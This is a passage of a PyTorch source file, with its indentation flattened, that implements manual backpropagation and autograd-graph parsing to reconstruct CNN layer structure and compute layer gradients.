pz[n,d,h,w] = dz[n,d,h//strides[0],w//strides[1]]
return pz
@torch.no_grad()
def judge_tensors_equal(tensor_A, tensor_B):
if(not tensor_A.shape == tensor_B.shape):
print('Shape of two compard tensors is not equal.')
return None
error = 0
error_tolerance = 0.001
np_A = tensor_A.detach().numpy()
np_B = tensor_B.detach().numpy()
if len(tensor_A.shape) == 4:
N, C, H, W = tensor_A.shape
for n in range(N):
for c in range(C):
for h in range(H):
for w in range(W):
if np_A[n,c,h,w]-np_B[n,c,h,w] > error_tolerance or np_B[n,c,h,w]-np_A[n,c,h,w] > error_tolerance:
error += 1
if error%20 == 0:
pass
print('error', np_A[n,c,h,w], np_B[n,c,h,w])
else:
if n*c*h*w % 20000000000000 == 0:
pass
#print('right', np_A[n,c,h,w], np_B[n,c,h,w])
#print('Error rate: ', error/(N*C*H*W))
print('4D-error-rate: ', end=' ')
return error/(N*C*H*W)
elif len(tensor_A.shape) == 1:
C = tensor_A.shape[0]
for c in range(C):
if np_A[c]-np_B[c] > error_tolerance or np_B[c]-np_A[c] > error_tolerance:
#print(np_A[c], np_B[c])
error += 1
#print('Error rate: ', error/C)
print('1D-error-rate: ', end=' ')
return error/C
elif len(tensor_A.shape) == 2:
N, C = tensor_A.shape
for n in range(N):
for c in range(C):
if np_A[n,c]-np_B[n,c] > error_tolerance or np_B[n,c]-np_A[n,c] > error_tolerance:
#print(np_A[n,c], np_B[n,c])
error += 1
#print('Error rate: ', error/(C*N))
print('2D-error-rate: ', end=' ')
return error/(C*N)
@torch.no_grad()
def get_featuremap(featuremap_dir=None):
import os
featuremap = []
if featuremap_dir == None:
pth_dir = "./tmp_file/"
else:
pth_dir = featuremap_dir
files = os.listdir(pth_dir)
file_nums = []
for i in range(len(files)):
if '.pth' in files[i]:
file_nums.append(int(files[i].split('.pth')[0]))
file_nums.sort()
for file_num in file_nums:
tensor = torch.load(pth_dir+str(file_num)+'.pth')
featuremap.append(tensor)
delete_allpths(pth_dir=None)
return featuremap
@torch.no_grad()
def get_structure_parameters_v1(model):
layers = []
for layer in model.modules():
if not ':' in str(layer):
layers.append(layer)
parameters = []
fc_conv_weights = []
for layer in layers:
if isinstance(layer, nn.Conv2d):
layer_name = 'Conv2d'
Conv2d_params = {}
Conv2d_params['layer_name'] = layer_name
# in_channel
in_channel = layer.__dict__.get('in_channels')
Conv2d_params['in_channel'] = in_channel
# out_channel
out_channel = layer.__dict__.get('out_channels')
Conv2d_params['out_channel'] = out_channel
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
Conv2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
Conv2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
Conv2d_params['stride'] = (stride, stride)
else:
Conv2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
Conv2d_params['padding'] = (padding, padding)
else:
Conv2d_params['padding'] = padding
# return
fc_conv_weights.append(layer.weight)
parameters.append(Conv2d_params)
elif isinstance(layer, nn.ReLU):
layer_name = 'ReLU'
parameters.append({'layer_name': layer_name})
elif isinstance(layer, nn.MaxPool2d):
layer_name = 'MaxPool2d'
MaxPool2d_params = {}
MaxPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
MaxPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
MaxPool2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
MaxPool2d_params['stride'] = (stride, stride)
else:
MaxPool2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
MaxPool2d_params['padding'] = (padding, padding)
else:
MaxPool2d_params['padding'] = padding
# return
parameters.append(MaxPool2d_params)
elif isinstance(layer, nn.AvgPool2d):
layer_name = 'AvgPool2d'
AvgPool2d_params = {}
AvgPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
AvgPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
AvgPool2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
AvgPool2d_params['stride'] = (stride, stride)
else:
AvgPool2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
AvgPool2d_params['padding'] = (padding, padding)
else:
AvgPool2d_params['padding'] = padding
# return
parameters.append(AvgPool2d_params)
elif isinstance(layer, nn.Dropout):
layer_name = 'Dropout'
Dropout_params = {}
Dropout_params['layer_name'] = layer_name
# p
p = layer.__dict__.get('p')
Dropout_params['p'] = p
# return
parameters.append(Dropout_params)
elif isinstance(layer, nn.BatchNorm2d):
layer_name = 'BatchNorm2d'
BatchNorm2d_params = {}
BatchNorm2d_params['layer_name'] = layer_name
# num_features
num_features = layer.__dict__.get('num_features')
BatchNorm2d_params['num_features'] = num_features
# eps
eps = layer.__dict__.get('eps')
BatchNorm2d_params['eps'] = eps
# return
fc_conv_weights.append(layer.weight)
parameters.append(BatchNorm2d_params)
elif isinstance(layer, nn.Linear):
layer_name = 'Linear'
Linear_params = {}
Linear_params['layer_name'] = layer_name
# in_features
in_features = layer.__dict__.get('in_features')
Linear_params['in_features'] = in_features
# out_features
out_features = layer.__dict__.get('out_features')
Linear_params['out_features'] = out_features
# return
fc_conv_weights.append(layer.weight)
parameters.append(Linear_params)
elif isinstance(layer, nn.AdaptiveAvgPool2d):
layer_name = 'AdaptiveAvgPool2d'
AdaptiveAvgPool2d_params = {}
AdaptiveAvgPool2d_params['layer_name'] = layer_name
# output_size
output_size = layer.__dict__.get('output_size')
if not isinstance(output_size, tuple):
AdaptiveAvgPool2d_params['output_size'] = (output_size, output_size)
else:
AdaptiveAvgPool2d_params['output_size'] = output_size
# return
parameters.append(AdaptiveAvgPool2d_params)
else:
print('The layer has not been processed in get_structure_parameters_v1!')
return parameters, fc_conv_weights
@torch.no_grad()
def delete_allpths(pth_dir=None):
import os
if pth_dir == None:
pth_dir = "./tmp_file/"
for root, dirs, files in os.walk(pth_dir, topdown=False):
for name in files:
if name.endswith('.pth',):
os.remove(os.path.join(root, name))
@torch.no_grad()
def mul_items(tensor_size):
x = list(tensor_size)
mul = 1.
for i in range(len(x)):
mul *= x[i]
return mul
@torch.no_grad()
def gradient_backward_v1(model, img, label, num_class=1000):
return_dz = []
parameters, fc_conv_weights = get_structure_parameters_v1(model)
featuremap = get_featuremap(featuremap_dir=None)
featuremap.insert(0, img) ###
y_true = F.one_hot(label, num_classes=num_class).float()
loss, dLoss_dz = cross_entropy_loss(featuremap[-1], y_true)
print('Self calculated loss: ', loss)
featuremap.pop()
return_dz.append(dLoss_dz)
dW_dB_fc_conv = []
for i in range(len(parameters)-1, -1, -1):
layer = parameters[i]
print('\n======================== {0:3} Layer: '.format(str(i))+'{0:9}'.format(layer['layer_name'])+' Backward Start ========================')
if layer['layer_name'] == 'Conv2d':
z = featuremap[-1]
weight_z = fc_conv_weights[-1]
try:
padding = layer['padding']
except:
padding = (0, 0)
stride = layer['stride']
dLoss_dz, dLoss_dW, dLoss_dB = conv_backward(dLoss_dz, weight_z, z, padding, stride)
return_dz.append(dLoss_dz)
fc_conv_weights.pop()
if not len(featuremap) == 1:
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'ReLU':
z = featuremap[-1]
dLoss_dz = relu_backward(dLoss_dz, z)
return_dz.append(dLoss_dz)
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'MaxPool2d':
z = featuremap[-1]
pooling = layer['kernel_size']
stride = layer['stride']
padding = layer['padding']
dLoss_dz = max_pooling_backward(dLoss_dz, z, pooling, stride, padding)
return_dz.append(dLoss_dz)
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'AvgPool2d':
z = featuremap[-1]
pooling = layer['kernel_size']
stride = layer['stride']
padding = layer['padding']
dLoss_dz = average_pooling_backward(dLoss_dz, z, pooling, stride, padding)
return_dz.append(dLoss_dz)
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'Linear':
weight_z = fc_conv_weights[-1]
z = featuremap[-1]
dLoss_dz, dLoss_dW, dLoss_dB = fc_backward(dLoss_dz, z, weight_z)
return_dz.append(dLoss_dz)
fc_conv_weights.pop()
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'Dropout':
p = layer['p']
mask = featuremap[-1]
dLoss_dz = dropback_backward(dLoss_dz, mask, p)
return_dz.append(dLoss_dz)
featuremap.pop()
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'BatchNorm2d':
eps = layer['eps']
z = featuremap[-1]
gamma = fc_conv_weights[-1]
dLoss_dz = batchnorm2d_backward(dLoss_dz, z, eps, gamma)
return_dz.append(dLoss_dz)
fc_conv_weights.pop()
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
else:
print('Not completed in gradient_backward_v1!')
print('======================== {0:3} Layer: '.format(str(i))+'{0:9}'.format(layer['layer_name'])+' Backward End ==========================')
delete_allpths(pth_dir=None)
return return_dz, dLoss_dW, dLoss_dB
@torch.no_grad()
def make_dot(var, params=None):
""" Produces Graphviz representation of PyTorch autograd graph
Blue nodes are the Variables that require grad, orange are Tensors
saved for backward in torch.autograd.Function
Args:
var: output Variable
params: dict of (name, Variable) to add names to node that
require grad (TODO: make optional)
"""
if params is not None:
        assert isinstance(list(params.values())[0], Variable)
param_map = {id(v): k for k, v in params.items()}
node_attr = dict(style='filled',
shape='box',
align='left',
fontsize='12',
ranksep='0.1',
height='0.2')
dot = Digraph(node_attr=node_attr, graph_attr=dict(size="12,12"))
seen = set()
def size_to_str(size):
return '('+(', ').join(['%d' % v for v in size])+')'
def add_nodes(var):
if var not in seen:
if torch.is_tensor(var):
dot.node(str(id(var)), size_to_str(var.size()), fillcolor='orange')
elif hasattr(var, 'variable'):
u = var.variable
name = param_map[id(u)] if params is not None else ''
node_name = '%s\n %s' % (name, size_to_str(u.size()))
dot.node(str(id(var)), node_name, fillcolor='lightblue')
else:
dot.node(str(id(var)), str(type(var).__name__))
seen.add(var)
if hasattr(var, 'next_functions'):
for u in var.next_functions:
if u[0] is not None:
dot.edge(str(id(u[0])), str(id(var)))
add_nodes(u[0])
if hasattr(var, 'saved_tensors'):
for t in var.saved_tensors:
dot.edge(str(id(t)), str(id(var)))
add_nodes(t)
print(var)
add_nodes(var.grad_fn)
return dot
def generate_g(model, x):
delete_allpths(pth_dir=None)
print('\n=========================== Store network model Results Start =========================')
y = model(x)
print('=========================== Store network model Results End ===========================\n')
if 'GoogLeNet' in str(model).split('\n')[0]:
g = make_dot(y[0])
return g
else:
g = make_dot(y)
return g
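# Minimal usage sketch (assumes torchvision is installed; names are illustrative):
#   import torchvision
#   model = torchvision.models.vgg16()
#   x = torch.randn(1, 3, 224, 224)
#   g = generate_g(model, x)                            # autograd graph via make_dot
#   connections, new_connections = generate_connections(g)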
@torch.no_grad()
def exchange_name(name):
if 'Relu' in name:
return 'ReLU'
elif 'AddmmBackward' in name:
return 'Linear'
elif 'ViewBackward' in name:
return 'View'
elif 'Mean' in name or 'Avg' in name:
return 'AvgPool2d'
elif 'BatchNorm' in name:
return 'BatchNorm2d'
elif 'Conv' in name:
return 'Conv2d'
elif 'MaxPool' in name:
return 'MaxPool2d'
elif 'MulBackward' in name:
return 'Dropout_2'
elif 'DivBackward' in name:
return 'Dropout_1'
elif 'AddBackward' in name:
return 'Add'
elif 'Cat' in name:
return 'Cat'
elif 'Hardtanh' in name:
return 'ReLU6'
else:
return 'None'
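# Illustrative mapping (autograd node names may vary between PyTorch versions):
#   'ReluBackward0'                  -> 'ReLU'
#   'MaxPool2DWithIndicesBackward0'  -> 'MaxPool2d'
#   'AddmmBackward0'                 -> 'Linear'
#   'ConvolutionBackward0'           -> 'Conv2d'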
@torch.no_grad()
def generate_connections(g):
graph = str(g).split('\n')
labels = {}
connections = []
for i in range(len(graph)):
if 'label' in graph[i] and graph[i][-1] == '"':
labels[(graph[i]+graph[i+1][1:]).split('\t')[1].split(' ')[0]]=\
(graph[i]+graph[i+1][1:]).split('\t')[1].split('"')[1]
if 'label' in graph[i] and graph[i][-1] == ']':
labels[graph[i].split('\t')[1].split(' ')[0]]=\
graph[i].split('\t')[1].split('=')[1].split(']')[0]
for i in range(len(graph)):
if '->' in graph[i]:
connections.append({labels[graph[i].split('\t')[1].split(' -> ')[0]]+'_'+\
graph[i].split('\t')[1].split(' -> ')[0]:\
labels[graph[i].split('\t')[1].split(' -> ')[1]]+'_'+\
graph[i].split('\t')[1].split(' -> ')[1]})
pop_index = []
for i in range(len(connections)):
item_key = list(connections[i].keys())[0]
if '(' in item_key or 'TBackward' in item_key:
pop_index.append(connections[i])
for i in range(len(pop_index)-1, -1, -1):
connections.remove(pop_index[i])
new_connections = []
for item in connections:
key, value = list(item.items())[0]
key1 = exchange_name(key.split('_')[0]) + '_' + key.split('_')[1]
value1 = exchange_name(value.split('_')[0]) + '_' + value.split('_')[1]
if 'None' in key1 or 'None' in value1:
print('Not completed for '+key+' or '+value+'! Check exchange_name function!')
exit()
new_connections.append({key1: value1})
if not len(new_connections) == len(connections):
print('Generate connections not done! Check generate_connections function!')
exit()
new_connections.insert(0, {list(new_connections[0].values())[0]: None})
new_connections.append({'None': 'None'})
return connections, new_connections
@torch.no_grad()
def get_split_connections(connections):
return_connections = []
tmp_split = []
for i in range(len(connections)):
item = connections[i]
if len(tmp_split) == 0:
tmp_split.append(item)
continue
value = list(item.values())[0]
last_key = list(tmp_split[-1].keys())[0]
if value == last_key:
tmp_split.append(item)
else:
return_connections.append(tmp_split)
tmp_split = [item]
return return_connections
@torch.no_grad()
def find_start_end(list_dic_key_value, i, j):
key1 = list(list_dic_key_value[i].values())[0]
key2 = list(list_dic_key_value[j].keys())[0]
start = 0
end = len(list_dic_key_value)-1
for index in range(len(list_dic_key_value)):
if key1 == list(list_dic_key_value[index].keys())[0]:
start = index
break
for index in range(len(list_dic_key_value)):
if key2 == list(list_dic_key_value[index].keys())[0]:
end = index
break
return start+1, end-1
@torch.no_grad()
def merge_connections(connections):
import copy
last_connections = copy.deepcopy(connections)
connections.append({'None':'None'})
num_Throwed = 0
notchoosed = []
print('\n=========================== Restore network model Start ===============================')
for i in range(len(connections)):
print('# Restore network model: processing {}/{}'.format(i, len(connections)-1))
item_key = list(connections[i].keys())[0]
if not 'None' in item_key:
if i == 0:
pass
else:
last_item_key = list(connections[i-1].keys())[0]
if not connections[i][item_key] == last_item_key:
for j in range(i+1, len(connections)):
if not list(connections[j].values())[0] == list(connections[j-1].keys())[0]:
notchoosed.append(i)
start, end = find_start_end(connections, i, j-1)
tmp = []
tmp.append(connections[start:end+1])
tmp.append(connections[i:j-1])
last_connections[start:end+1] = [tmp]
for kk in range(end-start):
last_connections.insert(start, 'Throwed')
num_Throwed += 1
break
if not notchoosed == []:
last_connections = last_connections[:notchoosed[0]]
else:
pass
for i in range(num_Throwed):
last_connections.remove('Throwed')
if last_connections[-1] == {'None': 'None'}:
last_connections.remove({'None': 'None'})
print('=========================== Restore network model End =================================\n')
return last_connections
@torch.no_grad()
def find_next_layer_by_name(layers, name, start_i):
for i in range(start_i, len(layers)):
layer = layers[i]
if name in str(layer):
return layer, i
@torch.no_grad()
def get_layers(last_connections, model):
return_layers = []
tmp_layers = []
for layer in model.modules():
if not ':' in str(layer):
tmp_layers.append(layer)
index_tmp_layers = 0
for i in range(len(last_connections)-1, -1, -1):
if not isinstance(last_connections[i], list):
            # single layer, no branching
current_layer_name = list(last_connections[i].keys())[0].split('_')[0]
if 'ReLU' in current_layer_name:
return_layers.insert(0, torch.nn.ReLU(inplace=True))
elif 'Add' in current_layer_name:
return_layers.insert(0, 'Add')
elif 'View' in current_layer_name:
return_layers.insert(0, 'View')
else:
tmp = find_next_layer_by_name(tmp_layers, current_layer_name, index_tmp_layers)
return_layers.insert(0, tmp[0])
if isinstance(last_connections[i-1], list):
index_tmp_layers = tmp[1] + 1
elif not list(last_connections[i-1].keys())[0].split('_')[0] == 'Dropout':
index_tmp_layers = tmp[1] + 1
else:
return_layers.insert(0, [])
for j in range(len(last_connections[i])):
return_layers[0].append([])
if len(last_connections[i][j]) == 0:
continue
for k in range(len(last_connections[i][j])-1, -1, -1):
current_layer_name = list(last_connections[i][j][k].keys())[0].split('_')[0]
if 'ReLU' in current_layer_name:
return_layers[0][j].insert(0, torch.nn.ReLU(inplace=True))
elif 'Add' in current_layer_name:
return_layers[0][j].insert(0, 'Add')
elif 'View' in current_layer_name:
return_layers.insert(0, 'View')
else:
tmp = find_next_layer_by_name(tmp_layers, current_layer_name, index_tmp_layers)
return_layers[0][j].insert(0, tmp[0])
if not list(last_connections[i][j][k-1].keys())[0].split('_')[0] == 'Dropout':
index_tmp_layers = tmp[1] + 1
return return_layers
@torch.no_grad()
def get_tensors(last_connections):
tensors = get_featuremap(featuremap_dir=None)
index_tensors = 0
import copy
last_tensors = copy.deepcopy(last_connections)
for i in range(len(last_connections)-1, -1, -1):
if not isinstance(last_connections[i], list):
current_layer_name = list(last_connections[i].keys())[0].split('_')[0]
if 'Add' in current_layer_name:
last_tensors[i] = 'Add'
elif 'View' in current_layer_name:
last_tensors[i] = 'View'
else:
last_tensors[i] = tensors[index_tensors]
index_tensors += 1
else:
for j in range(len(last_connections[i])):
if len(last_connections[i][j]) == 0:
continue
for k in range(len(last_connections[i][j])-1, -1, -1):
current_layer_name = list(last_connections[i][j][k].keys())[0].split('_')[0]
if 'Add' in current_layer_name:
last_tensors[i][j][k] = 'Add'
elif 'View' in current_layer_name:
last_tensors[i][j][k] = 'View'
else:
last_tensors[i][j][k] = tensors[index_tensors]
index_tensors += 1
for i in range(len(last_tensors)-1, -1, -1):
if isinstance(last_tensors[i], str):
# Add or View
if last_tensors[i] == 'Add':
last_tensors[i] = last_tensors[i+1][0][0] + last_tensors[i+1][1][0]
if last_tensors[i] == 'View':
last_tensors[i] = last_tensors[i+1].view(last_tensors[i+1].size(0), -1)
elif isinstance(last_tensors[i], list):
for j in range(len(last_tensors[i])):
if len(last_tensors[i][j]) == 0:
last_tensors[i][j].append(last_tensors[i+1])
return last_tensors
@torch.no_grad()
def get_structure_parameters(return_layers):
import copy
parameters = copy.deepcopy(return_layers)
fc_conv_weights = copy.deepcopy(return_layers)
for i in range(len(return_layers)):
layer = return_layers[i]
if isinstance(layer, nn.Conv2d):
layer_name = 'Conv2d'
Conv2d_params = {}
Conv2d_params['layer_name'] = layer_name
# in_channel
in_channel = layer.__dict__.get('in_channels')
Conv2d_params['in_channel'] = in_channel
# out_channel
out_channel = layer.__dict__.get('out_channels')
Conv2d_params['out_channel'] = out_channel
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
Conv2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
Conv2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
Conv2d_params['stride'] = (stride, stride)
else:
Conv2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
Conv2d_params['padding'] = (padding, padding)
else:
Conv2d_params['padding'] = padding
# return
fc_conv_weights[i] = layer.weight
parameters[i] = Conv2d_params
elif isinstance(layer, nn.ReLU):
layer_name = 'ReLU'
parameters[i] = {'layer_name': layer_name}
elif layer == 'Add':
layer_name = 'Add'
parameters[i] = {'layer_name': layer_name}
elif layer == 'View':
layer_name = 'View'
parameters[i] = {'layer_name': layer_name}
elif layer == 'Cat':
layer_name = 'Cat'
parameters[i] = {'layer_name': layer_name}
elif isinstance(layer, nn.MaxPool2d):
layer_name = 'MaxPool2d'
MaxPool2d_params = {}
MaxPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
MaxPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
MaxPool2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
MaxPool2d_params['stride'] = (stride, stride)
else:
MaxPool2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
MaxPool2d_params['padding'] = (padding, padding)
else:
MaxPool2d_params['padding'] = padding
# return
parameters[i] = MaxPool2d_params
elif isinstance(layer, nn.AvgPool2d):
layer_name = 'AvgPool2d'
AvgPool2d_params = {}
AvgPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
AvgPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
AvgPool2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
AvgPool2d_params['stride'] = (stride, stride)
else:
AvgPool2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
AvgPool2d_params['padding'] = (padding, padding)
else:
AvgPool2d_params['padding'] = padding
# return
parameters[i] = AvgPool2d_params
elif isinstance(layer, nn.Dropout):
layer_name = 'Dropout'
Dropout_params = {}
Dropout_params['layer_name'] = layer_name
# p
p = layer.__dict__.get('p')
Dropout_params['p'] = p
# return
parameters[i] = Dropout_params
elif isinstance(layer, nn.BatchNorm2d):
layer_name = 'BatchNorm2d'
BatchNorm2d_params = {}
BatchNorm2d_params['layer_name'] = layer_name
# num_features
num_features = layer.__dict__.get('num_features')
BatchNorm2d_params['num_features'] = num_features
# eps
eps = layer.__dict__.get('eps')
BatchNorm2d_params['eps'] = eps
# return
fc_conv_weights[i] = layer.weight
parameters[i] = BatchNorm2d_params
elif isinstance(layer, nn.Linear):
layer_name = 'Linear'
Linear_params = {}
Linear_params['layer_name'] = layer_name
# in_features
in_features = layer.__dict__.get('in_features')
Linear_params['in_features'] = in_features
# out_features
out_features = layer.__dict__.get('out_features')
Linear_params['out_features'] = out_features
# return
fc_conv_weights[i] = layer.weight
parameters[i] = Linear_params
elif isinstance(layer, nn.AdaptiveAvgPool2d):
layer_name = 'AdaptiveAvgPool2d'
AdaptiveAvgPool2d_params = {}
AdaptiveAvgPool2d_params['layer_name'] = layer_name
# output_size
output_size = layer.__dict__.get('output_size')
if not isinstance(output_size, tuple):
AdaptiveAvgPool2d_params['output_size'] = (output_size, output_size)
else:
AdaptiveAvgPool2d_params['output_size'] = output_size
# return
parameters[i] = AdaptiveAvgPool2d_params
elif isinstance(layer, list):
for j in range(len(layer)):
for k in range(len(layer[j])):
tmp_layer = layer[j][k]
###
if isinstance(tmp_layer, nn.Conv2d):
layer_name = 'Conv2d'
Conv2d_params = {}
Conv2d_params['layer_name'] = layer_name
# in_channel
in_channel = tmp_layer.__dict__.get('in_channels')
Conv2d_params['in_channel'] = in_channel
# out_channel
out_channel = tmp_layer.__dict__.get('out_channels')
Conv2d_params['out_channel'] = out_channel
# kernel_size
kernel_size = tmp_layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
Conv2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
Conv2d_params['kernel_size'] = kernel_size
# stride
stride = tmp_layer.__dict__.get('stride')
if not isinstance(stride, tuple):
Conv2d_params['stride'] = (stride, stride)
else:
Conv2d_params['stride'] = stride
# padding
padding = tmp_layer.__dict__.get('padding')
if not isinstance(padding, tuple):
Conv2d_params['padding'] = (padding, padding)
else:
Conv2d_params['padding'] = padding
# return
fc_conv_weights[i][j][k] = tmp_layer.weight
parameters[i][j][k] = Conv2d_params
elif isinstance(tmp_layer, nn.ReLU):
layer_name = 'ReLU'
parameters[i][j][k] = {'layer_name': layer_name}
elif tmp_layer == 'Add':
layer_name = 'Add'
parameters[i][j][k] = {'layer_name': layer_name}
elif tmp_layer == 'View':
layer_name = 'View'
parameters[i][j][k] = {'layer_name': layer_name}
elif tmp_layer == 'Cat':
layer_name = 'Cat'
parameters[i][j][k] = {'layer_name': layer_name}
elif isinstance(tmp_layer, nn.MaxPool2d):
layer_name = 'MaxPool2d'
MaxPool2d_params = {}
MaxPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = tmp_layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
MaxPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
MaxPool2d_params['kernel_size'] = kernel_size
# stride
stride = tmp_layer.__dict__.get('stride')
if not isinstance(stride, tuple):
MaxPool2d_params['stride'] = (stride, stride)
else:
MaxPool2d_params['stride'] = stride
# padding
padding = tmp_layer.__dict__.get('padding')
if not isinstance(padding, tuple):
MaxPool2d_params['padding'] = (padding, padding)
else:
MaxPool2d_params['padding'] = padding
# return
parameters[i][j][k] = MaxPool2d_params
elif isinstance(tmp_layer, nn.AvgPool2d):
layer_name = 'AvgPool2d'
AvgPool2d_params = {}
AvgPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = tmp_layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
AvgPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
AvgPool2d_params['kernel_size'] = kernel_size
# stride
stride = tmp_layer.__dict__.get('stride')
if not isinstance(stride, tuple):
AvgPool2d_params['stride'] = (stride, stride)
else:
AvgPool2d_params['stride'] = stride
# padding
padding = tmp_layer.__dict__.get('padding')
if not isinstance(padding, tuple):
AvgPool2d_params['padding'] = (padding, padding)
else:
AvgPool2d_params['padding'] = padding
# return
parameters[i][j][k] = AvgPool2d_params
elif isinstance(tmp_layer, nn.Dropout):
layer_name = 'Dropout'
Dropout_params = {}
Dropout_params['layer_name'] = layer_name
# p
p = tmp_layer.__dict__.get('p')
Dropout_params['p'] = p
# return
parameters[i][j][k] = Dropout_params
elif isinstance(tmp_layer, nn.BatchNorm2d):
layer_name = 'BatchNorm2d'
BatchNorm2d_params = {}
BatchNorm2d_params['layer_name'] = layer_name
# num_features
num_features = tmp_layer.__dict__.get('num_features')
BatchNorm2d_params['num_features'] = num_features
# eps
eps = tmp_layer.__dict__.get('eps')
BatchNorm2d_params['eps'] = eps
# return
fc_conv_weights[i][j][k] = tmp_layer.weight
parameters[i][j][k] = BatchNorm2d_params
elif isinstance(tmp_layer, nn.Linear):
layer_name = 'Linear'
Linear_params = {}
Linear_params['layer_name'] = layer_name
# in_features
in_features = tmp_layer.__dict__.get('in_features')
Linear_params['in_features'] = in_features
# out_features
out_features = tmp_layer.__dict__.get('out_features')
Linear_params['out_features'] = out_features
# return
fc_conv_weights[i][j][k] = tmp_layer.weight
parameters[i][j][k] = Linear_params
elif isinstance(tmp_layer, nn.AdaptiveAvgPool2d):
layer_name = 'AdaptiveAvgPool2d'
AdaptiveAvgPool2d_params = {}
AdaptiveAvgPool2d_params['layer_name'] = layer_name
# output_size
output_size = tmp_layer.__dict__.get('output_size')
if not isinstance(output_size, tuple):
AdaptiveAvgPool2d_params['output_size'] = (output_size, output_size)
else:
AdaptiveAvgPool2d_params['output_size'] = output_size
# return
parameters[i][j][k] = AdaptiveAvgPool2d_params
###
else:
print('The layer has not been processed in get_structure_parameters!')
return parameters, fc_conv_weights
def gradient_backward_v2(model, img, label, num_class=1000, g_view=False):
x = Variable(img)
g = generate_g(model, x)
if g_view:
g.view()
delete_allpths(pth_dir=None)
print('\n=========================== Generate Tensors Start ====================================')
result = model(img)
print('=========================== Generate Tensors End ======================================\n')
Loss = nn.CrossEntropyLoss()
if 'GoogLeNet' in str(model).split('\n')[0]:
loss_torch = Loss(result[0], label)
else:
loss_torch = Loss(result, label)
_, connections = generate_connections(g)
last_connections = merge_connections(connections)
return_layers = get_layers(last_connections, model)
return_tensors = get_tensors(last_connections)
parameters, fc_conv_weights = get_structure_parameters(return_layers)
'''
print('================')
for i in range(len(last_connections)):
print(i, last_connections[i])
print('================')
print('================')
for i in range(len(return_layers)):
print(i, return_layers[i])
print('================')
print('================')
for i in range(len(parameters)):
print(i, parameters[i])
print('================')
print('================')
for i in range(len(return_tensors)):
if not isinstance(return_tensors[i], list) and not isinstance(return_tensors[i], str):
print('=========', i, return_tensors[i].shape)
print('================')
'''
import copy
return_dz = copy.deepcopy(last_connections)
featuremap = return_tensors
featuremap.append(img)
y_true = F.one_hot(label, num_classes=num_class).float()
loss, dLoss_dz = cross_entropy_loss(featuremap[0], y_true)
featuremap.pop(0)
return_dz.append(dLoss_dz)
#####################tensors
'''
for i in range(len(last_connections)):
print(last_connections[i])
for i in range(len(featuremap)):
if not isinstance(featuremap[i], list):
print('=========', i, featuremap[i].shape)
else:
for j in range(len(featuremap[i])):
for k in range(len(featuremap[i][j])):
print(' =========', i, j, k, featuremap[i][j][k].shape)
'''
#####################
    # traverse the first n layers in reverse order of the forward pass
for i in range(len(parameters)):
layer = parameters[i]
if not isinstance(layer, list):
print('\n======================== {0:3} Layer: '.format(str(len(parameters)-1-i))+'{0:11}'.format(layer['layer_name'])+' Backward Start ========================')
if layer['layer_name'] == 'Conv2d':
z = featuremap[i]
